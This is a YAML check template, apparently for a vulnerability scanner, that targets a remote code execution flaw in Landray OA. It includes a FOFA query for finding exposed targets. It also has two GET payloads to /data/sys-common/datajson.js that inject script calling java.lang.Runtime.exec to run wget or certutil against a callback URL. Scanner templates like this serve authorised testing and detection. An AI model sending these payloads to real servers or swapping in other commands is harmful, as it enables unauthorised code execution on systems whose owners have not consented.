id: landray-oa-datajson-rce

info:
  name: Landray OA Datajson RCE
  author: xpoc
  severity: critical
  verified: false
  description: |
    FOFA: app="Landray-OA系统"
  reference: 
    - https://www.cnsuc.net/thread-553.htm
  tags: landray,rce
  created: 2023/06/22

set:
    reverse: newReverse()
    reverseURL: reverse.url
rules:
    r1:
        request:
            method: GET
            path: /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function test(){ return java.lang.Runtime};r=test();r.getRuntime().exec("wget -P /tmp/ {{reverseURL}}")&type=1
        expression: reverse.wait(5)
    r2:
        request:
            method: GET
            path: /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function test(){ return java.lang.Runtime};r=test();r.getRuntime().exec("certutil -urlcache -split -f {{reverseURL}}")&type=1
        expression: reverse.wait(5)
expression: r1() || r2()
